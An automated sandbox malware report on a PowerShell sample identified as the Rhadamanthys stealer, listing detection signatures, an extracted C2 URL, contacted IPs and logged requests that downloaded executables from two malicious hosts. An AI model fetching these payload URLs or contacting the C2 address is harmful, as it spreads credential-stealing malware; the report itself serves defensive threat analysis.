Windows Analysis Report
test.ps1

Overview

General Information

Sample name: test.ps1
Analysis ID: 1529309
MD5: b629e4a76638f91a67059188d07e27f6
SHA1: 42b37211578e971c684b493c8b604874518652e3
SHA256: b4dabf844bceeb5b1fa448549735296b4bdf289f346f960228d52a7a09e35ea1
Tags: ps1rocketdocs-loluser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dllhost Internet Connection
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: test.ps1 Avira: detected
Found malware configuration
Source: 00000007.00000002.1527561302.0000000003121000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\ajbs50ul.bat ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\oSyU.ini ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: test.ps1 ReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 3_2_00007FF79E9440F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\regsvr32.exe Code function: 4x nop then ret 7_2_1C0C10BC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 4x nop then dec esp 14_2_00000203FE6C5641
Source: C:\Windows\System32\rekeywiz.exe Code function: 4x nop then dec esp 16_2_00000260AF595641

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:49819
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52140
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52206
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:52242
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.7:52249
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:56563
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 13
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49769 -> 130.133.110.14:33445
Source: global traffic TCP traffic: 192.168.2.7:49770 -> 194.249.212.109:33445
Source: global traffic TCP traffic: 192.168.2.7:49819 -> 147.45.126.71:3752
Source: global traffic TCP traffic: 192.168.2.7:52242 -> 46.29.238.96:4872
Source: global traffic TCP traffic: 192.168.2.7:52249 -> 185.196.9.174:7777
Source: global traffic TCP traffic: 192.168.2.7:52252 -> 104.223.122.15:3389
Source: global traffic TCP traffic: 192.168.2.7:52253 -> 51.254.84.212:33445
Source: global traffic TCP traffic: 192.168.2.7:52255 -> 185.58.206.164:33445
Source: global traffic TCP traffic: 192.168.2.7:52256 -> 195.93.190.6:33445
Source: global traffic TCP traffic: 192.168.2.7:52258 -> 95.215.44.78:3389
Source: global traffic TCP traffic: 192.168.2.7:52259 -> 163.172.136.118:3389
Source: global traffic TCP traffic: 192.168.2.7:52261 -> 37.97.185.116:33445
Source: global traffic TCP traffic: 192.168.2.7:52262 -> 80.87.193.193:3389
Source: global traffic TCP traffic: 192.168.2.7:52263 -> 46.229.52.198:33445
Source: global traffic TCP traffic: 192.168.2.7:52264 -> 85.21.144.224:33445
Source: global traffic TCP traffic: 192.168.2.7:52265 -> 37.187.122.30:3389
Source: global traffic TCP traffic: 192.168.2.7:52266 -> 205.185.116.116:33445
Source: global traffic TCP traffic: 192.168.2.7:52267 -> 198.98.51.198:3389
Source: global traffic TCP traffic: 192.168.2.7:52268 -> 104.233.104.126:33445
Source: global traffic TCP traffic: 192.168.2.7:52272 -> 148.251.23.146:2306
Source: global traffic TCP traffic: 192.168.2.7:52274 -> 193.124.186.205:33445
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.7:52138 -> 162.159.36.2:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52140
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.7:52206
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947E00 recv,WSAGetLastError, 3_2_00007FF79E947E00
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
